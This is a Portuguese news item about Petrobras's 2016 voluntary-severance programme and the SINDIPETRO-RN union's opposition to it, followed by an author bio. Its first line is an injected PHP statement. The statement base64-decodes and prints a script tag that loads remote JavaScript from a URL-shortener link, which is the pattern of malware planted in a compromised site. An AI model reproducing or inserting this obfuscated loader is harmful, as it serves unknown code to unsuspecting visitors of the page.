$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Petrobras anuncia novo plano de desligamento

Foto Agência Brasil
03 Abr 2016

A Petrobras anunciou novo Programa de Incentivo ao Desligamento Voluntário (PIDV). O objetivo anunciado pela empresa é o de “adequar a força de trabalho às necessidades do Plano de Negócios e Gestão, buscando otimizar a produtividade com foco no alcance de metas”. A Diretoria Colegiada do SINDIPETRO-RN opõem-se frontalmente a essa medida.

Segundo o comunicado publicado no blog Fatos e Dados, “o PIDV foi desenvolvido com base nas premissas de preservação do efetivo necessário à continuidade operacional da companhia”. No entanto, conforme observa o Sindicato, a decisão de reduzir custos com pessoal ignora completamente o compromisso de reposição de efetivos, assumido pela Petrobrás quando da edição do último PIDV.

Caso a estimativa da companhia venha a se concretizar, o custo de implantação do PIDV 2016 chegará a R$ 4,4 bilhões.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *